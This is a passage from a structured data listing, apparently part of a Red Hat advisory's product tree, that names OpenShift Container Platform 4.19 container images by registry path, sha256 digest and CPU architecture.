"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
